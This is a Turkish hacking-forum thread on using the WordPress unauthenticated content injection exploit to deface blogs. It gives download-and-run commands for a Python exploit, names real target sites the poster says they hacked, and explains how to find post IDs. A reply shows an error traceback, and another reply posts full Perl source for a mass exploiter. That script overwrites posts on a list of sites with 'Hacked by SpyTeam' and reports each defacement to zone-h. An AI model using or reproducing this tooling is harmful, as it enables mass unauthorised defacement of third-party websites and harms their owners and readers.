Wordpress Unauthenticated Content Injection Exploit Kullanımı (1 Viewer)

Joined
Dec 1, 2015
Credits
201,695
Rating - 94.7%
Wordpress Unauthenticated Content Injection

Piyasaya yeni düşen bu exploit ile wordpress blog sitelerinin postlarına kendi mesajınızı inject edebiliyorsunuz , öncelikle python çalıştırabilecek bir terminale ihtiyacınız var , bende fazladan bir sunucu olduğu için putty ile bağlanıp sunucunun terminalinde exploiti çalıştırdım. Sizde kali var ise ordanda işinizi görebilirsiniz kolayca

ilk önce hedef siteyi belirledim.
http://www.elitevmb.com/uncategorized/hello-world/



sonra exploiti aşağıdaki komutla terminale çektim
wget http://w0rms.com/wp.py

ardından aşağıdaki komut ile bir dosya oluşturun
nano mec

oluşturduğunuz mec dosyasının içine html index kodlarınızı yerleştirin ve kayıt edip dosyayı kapatın

ikinci adım olarak bir aşağıdaki komutu girdim , girdikten sonra aşağıdaki resimdeki gibi bir sonuç çıktı
python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec

vXOR9A.png


Post updated. Check it out at --> bu kısımda size hacklenen url yi otomatik olarak veriyor.

Sonuç olarak post kısmı hacklendi

adV047.png



Piyasada hala daha belkide milyonlarca açıklı wordpress site var bu şekilde. bu açığı çok daha faydalı kullanabilirsiniz.

python exploit manuel indirmek için : http://w0rms.com/wp.py

MAKALEYE EK YAPILDI !!

python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec

yukardaki komutumuzu biliyorsunuz , oradaki 1 rakamı sitede bulunan postun id numarasını temsil eder ve ilk post olan id 1 ile numaralandırılmış postu hacklemiş olursunuz , ancak siz ana sayfadaki postları hacklemek istiyorsunuz ? ozaman sitenin kaynak kodunu açın ve post- şeklinde veya post_id olarak aratın genellikle yanında bir rakam olur işte o post id numarasıdır , örnek verecek olursam hedefsite.com/?p=325 bu şekilde id noları deneyebilirsiniz , anasayfadaki postu bulana kadar hızlıca denemeler yapıp kolayca bulmanız mümkün , zaten kaynak koddan çıkan id numaraları ana sayfadaki postlara ait oluyor , mesala bulduk en tepedeki postun id nosunu ve bu numara diyelimki 325 , ozaman kodumuz aşağıdaki gibi olacak

python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 325 mec

yani id 1 olmadı diye hemen başka siteye geçmeyin , sitedeki post idlerini manuel olarakda araştırın.
örnek yeni hacklediğim site: http://www.hostadasi.com/google-apps-mx-kaydi-degerleri.html id numarası 325 di :)
 
Last edited:

Alperen50

Müptezel Boksör
Joined
Apr 11, 2016
Credits
0
Rating - 0%
Abi anlatan ellerine saglık , Açık yeni düştü arkadaşlar cogu ünlü yerde hala mevcut güncelleme yapmıyorlar misyon dahilinde kullanmanız dilegiyle :)
 

IboCanReyis

-------
Joined
Jan 5, 2017
Credits
0
Rating - 0%
upload_2017-2-11_0-12-31.png

Tamamdır Hocam Halletim çalışıyor

teşekkür ederim paylaşım için senin şu bastıgına bastım denemek için sory :D
 

Dj_Taleh

Old User / Hack3r

SOYTARI
Joined
Oct 10, 2016
Credits
0
Rating - 0%
He @Mectruy kardeşim zaten Holako ve index.php hackerlerde yaklaşık 20 gun icersinde fazla site dusuruyorlar

Evet arkadaşlar sordugunuz sorunun cevapı işte ama şunuda söyleyelim tabii c99 falan gibi shel sokamazsınız olsa olsa up shel ata bilirsiniz yada .html shel gibi

Teşekkür brom yarın icin bende ayarlıycam daha 4 gun once cıkmış wp hack exploitini...
 
Joined
Nov 23, 2016
Credits
0
Rating - 0%
Wordpress Unauthenticated Content Injection

Piyasaya yeni düşen bu exploit ile wordpress blog sitelerinin postlarına kendi mesajınızı inject edebiliyorsunuz , öncelikle python çalıştırabilecek bir terminale ihtiyacınız var , bende fazladan bir sunucu olduğu için putty ile bağlanıp sunucunun terminalinde exploiti çalıştırdım. Sizde kali var ise ordanda işinizi görebilirsiniz kolayca

ilk önce hedef siteyi belirledim.
http://www.elitevmb.com/uncategorized/hello-world/



sonra exploiti aşağıdaki komutla terminale çektim
wget http://w0rms.com/wp.py

ardından aşağıdaki komut ile bir dosya oluşturun
nano mec

oluşturduğunuz mec dosyasının içine html index kodlarınızı yerleştirin ve kayıt edip dosyayı kapatın

ikinci adım olarak bir aşağıdaki komutu girdim , girdikten sonra aşağıdaki resimdeki gibi bir sonuç çıktı
python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec

vXOR9A.png


Post updated. Check it out at --> bu kısımda size hacklenen url yi otomatik olarak veriyor.

Sonuç olarak post kısmı hacklendi

adV047.png



Piyasada hala daha belkide milyonlarca açıklı wordpress site var bu şekilde. bu açığı çok daha faydalı kullanabilirsiniz.

python exploit manuel indirmek için : http://w0rms.com/wp.py

MAKALEYE EK YAPILDI !!

python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 1 mec

yukardaki komutumuzu biliyorsunuz , oradaki 1 rakamı sitede bulunan postun id numarasını temsil eder ve ilk post olan id 1 ile numaralandırılmış postu hacklemiş olursunuz , ancak siz ana sayfadaki postları hacklemek istiyorsunuz ? ozaman sitenin kaynak kodunu açın ve post- şeklinde veya post_id olarak aratın genellikle yanında bir rakam olur işte o post id numarasıdır , örnek verecek olursam hedefsite.com/?p=325 bu şekilde id noları deneyebilirsiniz , anasayfadaki postu bulana kadar hızlıca denemeler yapıp kolayca bulmanız mümkün , zaten kaynak koddan çıkan id numaraları ana sayfadaki postlara ait oluyor , mesala bulduk en tepedeki postun id nosunu ve bu numara diyelimki 325 , ozaman kodumuz aşağıdaki gibi olacak

python wp.py http://www.elitevmb.com/uncategorized/hello-world/ 325 mec

yani id 1 olmadı diye hemen başka siteye geçmeyin , sitedeki post idlerini manuel olarakda araştırın.
örnek yeni hacklediğim site: http://www.hostadasi.com/google-apps-mx-kaydi-degerleri.html id numarası 325 di :)
Üstad eline sağlık fakat şöyle hata veriyor :
Code:
python wp.py http://nubianqueenon101.com/uncategorized/hello-world/ 1 mec
* Discovering API Endpoint
* API lives at: http://nubianqueenon101.com/wp-json/
* Updating post 1
Traceback (most recent call last):
  File "wp.py", line 104, in <module>
    update_post(api_url, sys.argv[2], ''.join(new_content))
  File "wp.py", line 66, in update_post
    response = urllib2.urlopen(req).read()
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 435, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 473, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 403: Forbidden
 

Kuroi

Legendary
Joined
Feb 3, 2017
Credits
0
Rating - 0%
Mass Exploiter :


Code:
#!/usr/bin/perl
#WP Content Injection Mass Exploiter
#Coded By Kuroi'SH / 3/2/2017
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);

print "  WP Content Injection | Kuroi'SH\n";
print " site:";
my $list=<STDIN>;
chomp($list);
  open (THETARGET, "<$list") || die "[-] List Berow !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$linkposts = $site . 'index.php/wp-json/wp/v2/posts/';


print "Scaning  $site\n";

$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
$ua->timeout (10);


$sorm = $ua->get($linkposts);
$karza = $sorm->content;
if($karza =~/\/?p=(.*?)\"\}/)
{
$id=$1;

$ajx = $site . '/wp-json/wp/v2/posts/'.$id;
$sormm = $ua->get($ajx);
$karzaa = $sormm->content;
if($karzaa =~/link\":\"(.*?)\",\"/)
{
$link=$1;
$link =~ s/\\|//g;


    open(save, '>>links.txt');
    print save "$link\n";
    close(save);
$def="Hacked by Spyteam";
$sirina=$id . 'justracccwdata';
#print "[Def] $link\n";
$gassface = POST $ajx, ['id' => $sirina, 'title' => 'hacked By SpyTeam', 'content' => $def ];
$response = $ua->request($gassface);
$stat = $response->content;
#print $stat;
    if ($stat =~ /Kuroi'SH/){
print colored ("[+]Hi Gass! Web Fucked!!",'white on_red'),"\n";
zonpost();
}else{
print colored ("[-]Not Fucked :( ",'white on_blue'),"\n";
}
}
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked|Spy|Kuroi'SH/){

                $dmn= $link;
                $def="SpyTeam";
                $zn="http://zone-h.org/notify/single";
                $lwp=LWP::UserAgent->new;
                $res=$lwp  -> post($zn,[
                'defacer'     => $def,
                'domain1'   => $dmn,
                'hackmode' => '15',
                'reason'       => '1',
                'submit'       => 'Send',
                ]);
                if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
                print colored ("[-]submit $1",'white on_green'),"\n";
                }
                else
                {
                print colored ("[-]Error",'black on_white'),"\n";
                }
                    }else{
                        print" Not Defaced Gass !! \n";
}
}
 
Last edited by a moderator:

Users who are viewing this thread

Top